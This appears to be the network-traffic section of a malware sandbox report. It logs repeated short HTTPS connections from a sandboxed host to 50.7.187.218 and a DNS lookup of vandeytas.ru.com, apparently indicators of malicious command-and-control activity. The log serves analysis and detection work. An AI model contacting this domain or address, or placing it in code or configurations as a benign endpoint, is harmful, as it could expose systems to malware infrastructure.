          Nov 26, 2024 08:12:39.583563089 CET49979443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:39.585680962 CET49979443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:39.585686922 CET4434997950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:39.585992098 CET4434997950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:39.587744951 CET49979443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:39.635335922 CET4434997950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:40.103040934 CET4434997950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:40.103128910 CET4434997950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:40.103208065 CET49979443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:40.103442907 CET49979443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:40.103442907 CET49979443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:40.103461981 CET4434997950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:40.103472948 CET4434997950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:40.278304100 CET49985443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:40.278371096 CET4434998550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:40.278522015 CET49985443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:40.278717041 CET49985443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:40.278830051 CET4434998550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:40.278915882 CET49985443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:40.288615942 CET49986443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:40.288662910 CET4434998650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:40.288748980 CET49986443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:40.289061069 CET49986443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:40.289074898 CET4434998650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:41.748128891 CET4434998650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:41.748297930 CET49986443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:41.750066042 CET49986443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:41.750072002 CET4434998650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:41.750452042 CET4434998650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:41.751925945 CET49986443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:41.795324087 CET4434998650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:42.276931047 CET4434998650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:42.277012110 CET4434998650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:42.277091980 CET49986443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:42.277405024 CET49986443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:42.277420998 CET4434998650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:42.277434111 CET49986443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:42.277440071 CET4434998650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:42.454072952 CET49992443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:42.454135895 CET4434999250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:42.454214096 CET49992443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:42.454356909 CET49992443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:42.454404116 CET4434999250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:42.454452038 CET49992443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:42.465842009 CET49993443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:42.465887070 CET4434999350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:42.465977907 CET49993443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:42.467241049 CET49993443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:42.467259884 CET4434999350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:43.888427973 CET4434999350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:43.888556957 CET49993443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:43.890178919 CET49993443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:43.890189886 CET4434999350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:43.890448093 CET4434999350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:43.891769886 CET49993443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:43.939330101 CET4434999350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:44.406183004 CET4434999350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:44.406289101 CET4434999350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:44.406374931 CET49993443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:44.406671047 CET49993443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:44.406697035 CET4434999350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:44.406718016 CET49993443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:44.406727076 CET4434999350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:44.598004103 CET49999443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:44.598059893 CET4434999950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:44.598120928 CET49999443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:44.598237038 CET49999443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:44.598285913 CET4434999950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:44.598449945 CET49999443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:44.608174086 CET50000443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:44.608210087 CET4435000050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:44.608351946 CET50000443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:44.608676910 CET50000443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:44.608686924 CET4435000050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.022576094 CET4435000050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.022721052 CET50000443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.024245977 CET50000443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.024255037 CET4435000050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.024519920 CET4435000050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.025769949 CET50000443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.071332932 CET4435000050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.544049025 CET4435000050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.544135094 CET4435000050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.544193029 CET50000443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.544461966 CET50000443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.544501066 CET4435000050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.544521093 CET50000443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.544532061 CET4435000050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.721126080 CET50006443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.721148014 CET4435000650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.721218109 CET50006443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.721299887 CET50006443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.721409082 CET4435000650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.721474886 CET50006443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.730467081 CET50007443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.730487108 CET4435000750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:46.730570078 CET50007443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.730878115 CET50007443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:46.730894089 CET4435000750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.152676105 CET4435000750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.152774096 CET50007443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.178352118 CET50007443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.178375959 CET4435000750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.179426908 CET4435000750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.180927992 CET50007443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.223335981 CET4435000750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.677303076 CET4435000750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.677397966 CET4435000750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.677458048 CET50007443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.677747965 CET50007443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.677766085 CET4435000750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.677782059 CET50007443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.677788973 CET4435000750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.856249094 CET50013443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.856297016 CET4435001350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.856411934 CET50013443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.857501030 CET50013443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.857578993 CET4435001350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.857690096 CET50013443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.867036104 CET50014443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.867073059 CET4435001450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:48.867204905 CET50014443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.867497921 CET50014443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:48.867516994 CET4435001450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:50.278584003 CET4435001450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:50.278727055 CET50014443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:50.280395031 CET50014443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:50.280406952 CET4435001450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:50.280673027 CET4435001450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:50.281857967 CET50014443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:50.323369980 CET4435001450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:50.819891930 CET4435001450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:50.819950104 CET4435001450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:50.820046902 CET50014443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:50.825368881 CET50014443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:50.825383902 CET4435001450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:50.825396061 CET50014443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:50.825401068 CET4435001450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:51.001724005 CET50019443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:51.001785040 CET4435001950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:51.001858950 CET50019443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:51.002048016 CET50019443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:51.002119064 CET4435001950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:51.002175093 CET50019443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:51.011445045 CET50020443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:51.011497021 CET4435002050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:51.011558056 CET50020443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:51.011948109 CET50020443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:51.011961937 CET4435002050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:52.421926975 CET4435002050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:52.422055960 CET50020443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:52.423437119 CET50020443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:52.423445940 CET4435002050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:52.423790932 CET4435002050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:52.425172091 CET50020443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:52.471327066 CET4435002050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:52.939841986 CET4435002050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:52.939944029 CET4435002050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:52.940059900 CET50020443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:52.940469980 CET50020443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:52.940469980 CET50020443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:52.940493107 CET4435002050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:52.940501928 CET4435002050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:53.112890005 CET50026443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:53.112938881 CET4435002650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:53.113045931 CET50026443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:53.113168955 CET50026443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:53.113223076 CET4435002650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:53.113329887 CET50026443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:53.122278929 CET50027443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:53.122344971 CET4435002750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:53.122438908 CET50027443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:53.122737885 CET50027443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:53.122752905 CET4435002750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:54.490317106 CET4435002750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:54.490536928 CET50027443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:54.492106915 CET50027443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:54.492120028 CET4435002750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:54.492394924 CET4435002750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:54.493738890 CET50027443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:54.539329052 CET4435002750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:55.001497030 CET4435002750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:55.001585960 CET4435002750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:55.001794100 CET50027443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:55.001986980 CET50027443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:55.002016068 CET4435002750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:55.002034903 CET50027443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:55.002042055 CET4435002750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:55.178874016 CET50032443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:55.178942919 CET4435003250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:55.179029942 CET50032443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:55.179133892 CET50032443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:55.179203987 CET4435003250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:55.179265022 CET50032443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:55.188688040 CET50033443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:55.188726902 CET4435003350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:55.188832998 CET50033443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:55.189168930 CET50033443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:55.189183950 CET4435003350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:56.648883104 CET4435003350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:56.649069071 CET50033443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:56.650346041 CET50033443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:56.650355101 CET4435003350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:56.650614023 CET4435003350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:56.652147055 CET50033443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:56.699335098 CET4435003350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:57.177984953 CET4435003350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:57.178060055 CET4435003350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:57.178188086 CET50033443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:57.178431034 CET50033443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:57.178447962 CET4435003350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:57.178467989 CET50033443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:57.178473949 CET4435003350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:57.349941969 CET50039443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:57.349975109 CET4435003950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:57.350087881 CET50039443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:57.350236893 CET50039443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:57.350294113 CET4435003950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:57.350354910 CET50039443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:57.359014988 CET50040443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:57.359065056 CET4435004050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:57.359133005 CET50040443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:57.359466076 CET50040443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:57.359479904 CET4435004050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:58.769694090 CET4435004050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:58.769829988 CET50040443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:58.771265030 CET50040443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:58.771275997 CET4435004050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:58.771512985 CET4435004050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:58.772725105 CET50040443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:58.819319963 CET4435004050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:59.288428068 CET4435004050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:59.288501024 CET4435004050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:59.288599014 CET50040443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:59.311345100 CET50040443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:59.311373949 CET4435004050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:59.311419964 CET50040443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:59.311427116 CET4435004050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:59.481585979 CET50046443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:59.481615067 CET4435004650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:59.481690884 CET50046443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:59.481751919 CET50046443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:59.481828928 CET4435004650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:59.481880903 CET50046443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:59.490434885 CET50047443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:59.490477085 CET4435004750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:59.490572929 CET50047443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:59.490858078 CET50047443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:59.490873098 CET4435004750.7.187.218192.168.2.6
          Nov 26, 2024 08:13:00.903202057 CET4435004750.7.187.218192.168.2.6
          Nov 26, 2024 08:13:00.903306007 CET50047443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:00.904681921 CET50047443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:00.904694080 CET4435004750.7.187.218192.168.2.6
          Nov 26, 2024 08:13:00.904947042 CET4435004750.7.187.218192.168.2.6
          Nov 26, 2024 08:13:00.906229019 CET50047443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:00.947336912 CET4435004750.7.187.218192.168.2.6
          Nov 26, 2024 08:13:01.421694994 CET4435004750.7.187.218192.168.2.6
          Nov 26, 2024 08:13:01.421780109 CET4435004750.7.187.218192.168.2.6
          Nov 26, 2024 08:13:01.421845913 CET50047443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:01.702955008 CET50047443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:01.702955008 CET50047443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:01.702980995 CET4435004750.7.187.218192.168.2.6
          Nov 26, 2024 08:13:01.702991009 CET4435004750.7.187.218192.168.2.6
          Nov 26, 2024 08:13:01.877660990 CET50053443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:01.877708912 CET4435005350.7.187.218192.168.2.6
          Nov 26, 2024 08:13:01.877768040 CET50053443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:01.877863884 CET50053443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:01.877904892 CET4435005350.7.187.218192.168.2.6
          Nov 26, 2024 08:13:01.877959013 CET50053443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:01.887516975 CET50054443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:01.887554884 CET4435005450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:01.887624979 CET50054443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:01.887938976 CET50054443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:01.887948990 CET4435005450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:03.301173925 CET4435005450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:03.301312923 CET50054443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:03.302779913 CET50054443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:03.302786112 CET4435005450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:03.303030014 CET4435005450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:03.304727077 CET50054443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:03.351330996 CET4435005450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:03.823882103 CET4435005450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:03.823947906 CET4435005450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:03.824007034 CET50054443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:03.824321985 CET50054443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:03.824341059 CET4435005450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:03.824351072 CET50054443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:03.824361086 CET4435005450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:03.997699976 CET50059443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:03.997756958 CET4435005950.7.187.218192.168.2.6
          Nov 26, 2024 08:13:03.997873068 CET50059443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:04.001631021 CET50059443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:04.001692057 CET4435005950.7.187.218192.168.2.6
          Nov 26, 2024 08:13:04.001758099 CET50059443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:04.011897087 CET50061443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:04.011943102 CET4435006150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:04.012080908 CET50061443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:04.012360096 CET50061443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:04.012377024 CET4435006150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:05.421603918 CET4435006150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:05.421742916 CET50061443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:05.423162937 CET50061443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:05.423176050 CET4435006150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:05.423445940 CET4435006150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:05.424706936 CET50061443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:05.471362114 CET4435006150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:05.940591097 CET4435006150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:05.940668106 CET4435006150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:05.940746069 CET50061443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:05.941056967 CET50061443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:05.941056967 CET50061443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:05.941076994 CET4435006150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:05.941087961 CET4435006150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:06.111413002 CET50064443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:06.111460924 CET4435006450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:06.111591101 CET50064443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:06.111747026 CET50064443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:06.111800909 CET4435006450.7.187.218192.168.2.6
          Nov 26, 2024 08:13:06.111949921 CET50064443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:06.121432066 CET50065443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:06.121483088 CET4435006550.7.187.218192.168.2.6
          Nov 26, 2024 08:13:06.121557951 CET50065443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:06.121906996 CET50065443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:06.121920109 CET4435006550.7.187.218192.168.2.6
          Nov 26, 2024 08:13:07.488178968 CET4435006550.7.187.218192.168.2.6
          Nov 26, 2024 08:13:07.488315105 CET50065443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:07.489825010 CET50065443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:07.489831924 CET4435006550.7.187.218192.168.2.6
          Nov 26, 2024 08:13:07.490076065 CET4435006550.7.187.218192.168.2.6
          Nov 26, 2024 08:13:07.491297007 CET50065443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:07.535330057 CET4435006550.7.187.218192.168.2.6
          Nov 26, 2024 08:13:07.998691082 CET4435006550.7.187.218192.168.2.6
          Nov 26, 2024 08:13:07.998843908 CET4435006550.7.187.218192.168.2.6
          Nov 26, 2024 08:13:07.998908997 CET50065443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:08.009546995 CET50065443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:08.009569883 CET4435006550.7.187.218192.168.2.6
          Nov 26, 2024 08:13:08.009583950 CET50065443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:08.009589911 CET4435006550.7.187.218192.168.2.6
          Nov 26, 2024 08:13:08.187525034 CET50071443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:08.187561989 CET4435007150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:08.187722921 CET50071443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:08.193084955 CET50071443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:08.193133116 CET4435007150.7.187.218192.168.2.6
          Nov 26, 2024 08:13:08.193223000 CET50071443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:08.203448057 CET50072443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:08.203471899 CET4435007250.7.187.218192.168.2.6
          Nov 26, 2024 08:13:08.203541040 CET50072443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:08.204166889 CET50072443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:08.204178095 CET4435007250.7.187.218192.168.2.6
          Nov 26, 2024 08:13:09.615797997 CET4435007250.7.187.218192.168.2.6
          Nov 26, 2024 08:13:09.615876913 CET50072443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:09.617523909 CET50072443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:09.617532015 CET4435007250.7.187.218192.168.2.6
          Nov 26, 2024 08:13:09.617780924 CET4435007250.7.187.218192.168.2.6
          Nov 26, 2024 08:13:09.619046926 CET50072443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:09.659358025 CET4435007250.7.187.218192.168.2.6
          Nov 26, 2024 08:13:10.185405970 CET4435007250.7.187.218192.168.2.6
          Nov 26, 2024 08:13:10.185480118 CET4435007250.7.187.218192.168.2.6
          Nov 26, 2024 08:13:10.185528040 CET50072443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:10.185861111 CET50072443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:10.185875893 CET4435007250.7.187.218192.168.2.6
          Nov 26, 2024 08:13:10.185887098 CET50072443192.168.2.650.7.187.218
          Nov 26, 2024 08:13:10.185893059 CET4435007250.7.187.218192.168.2.6
          TimestampSource PortDest PortSource IPDest IP
          Nov 26, 2024 08:11:06.508061886 CET5005153192.168.2.61.1.1.1
          Nov 26, 2024 08:11:07.517246962 CET5005153192.168.2.61.1.1.1
          Nov 26, 2024 08:11:07.852077007 CET53500511.1.1.1192.168.2.6
          Nov 26, 2024 08:11:07.852108002 CET53500511.1.1.1192.168.2.6
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Nov 26, 2024 08:11:06.508061886 CET192.168.2.61.1.1.10x5fb8Standard query (0)vandeytas.ru.comA (IP address)IN (0x0001)false
